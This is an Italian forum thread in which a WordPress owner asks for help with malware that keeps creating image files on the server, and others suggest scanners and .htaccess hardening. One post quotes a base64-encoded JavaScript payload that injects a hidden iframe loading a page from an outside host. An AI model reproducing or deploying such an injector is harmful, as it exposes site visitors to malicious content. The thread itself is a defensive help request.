• User

    Dannato virus che crea di continuo file di immagini sul server

    Salve ragazzi. Chiedo venia quà sopra per un problema che mi sta assillando da mesi e a cui ancora non ho trovato risposta. Vengo al sodo: ho un dannatissimo virus che mi crea continuamente cartelle e file di immagini .jpg sul server del mio sito... per la precisione in cartelle come uploads e in quelle dei plugin. Insieme all'amministratore del server le abbiamo provate di tutte, da cambiare tutte le psw (ftp e http di tutti i blog), a cambiare permessi sui file, sugli accessi, a installare plugin di sicurezza wordpress. Risultato: zero, nessuno... si ricreanno sempre sti maledetti file! Che voi sappiate esiste una soluzione a sto problema? Sono disperato...

    P.s: per sta cosa google mi ha anche messo il blog in black list etichettandolo come non sicuro...e ovviamente se non risolvo completamente e definitivamente il problema non posso informarlo di togliermi sto messaggio...


  • User Attivo

    sitecheck.sucuri.net/scanner/ se non riesci a capire qual'è la causa fai fare il lavoro a loro per 90 dollari.


  • User Attivo

    Se hai un IP statico puoi provare a proteggere la cartella wp-admin con un file .htaccess con questo contenuto:

    Order Deny,Allow
    Allow from ww.xx.yy.zz 
    Deny from all
    

    Stesso discorso per wp-content e wp-includes crei un .htaccess consentendo l?accesso solo ad alcune risorse per esempio:

    Order Allow,Deny
    Deny from all
    <Files ~ ".(css|jpe?g|png|gif|js)$">
    Allow from all 
    </Files>
    

    Puoi provare a creare anche un file vuoto index.html index.html in /plugin e /themes per nasconderne il contenuto.


  • User

    In pratica a me accade che si crea una cartella .svn dentro /dev/shm con file eseguibili (che non vengono eseguiti perchè il server lo impedisce per policy di sicurezza) e che hanno del javascript encoded in base64 dentro che chiamerebbe un iframe..

    I file non vengono eseguiti ma vorrei capire come ci arrivano, da quale modulo o bug di wp...

    Il codice che cerca di essere eseguito è il seguente:

    Y2pyZD0nPGlmcmFtZSBzcmM9Imh0dHA6Ly90b2Zhdm9yaXRlc2VkaXQuYnIubXM6ODEvcmVtMi5odG1sIiBmcmFtZWJvcmRlcj0wIG1hcmdpbmhlaWdodD0wIG1hcmdpbndpZHRoPTAgc2Nyb2xsaW5nPSJubyIgYWxsb3dUcmFuc3BhcmVuY3k9InRydWUiIHN0eWxlPSJ3aWR0aDoxOXB4O3Bvc2l0aW9uOmFic29sdXRlO2xlZnQ6LTIzMDRweDsiPjwvaWZyYW1lPic7IGRvY3VtZW50LndyaXRlKGNqcmQpOw==


  • User Attivo

    Prima devi capire da dove entra ed eliminare la falla che potrebbe essere molto probabilmente un plugin, poi applichi le protezioni come quella indicata da manetta.
    Inutile che posti il codice eval, non serve a niente, ripeto hai provato con sucuri?
    In questo articolo ci sono le stesse indicazioni che ti ha dato manetta ma anche altre tra cui quella di cambiare host
    http://digwp.com/2012/09/secure-media-uploads/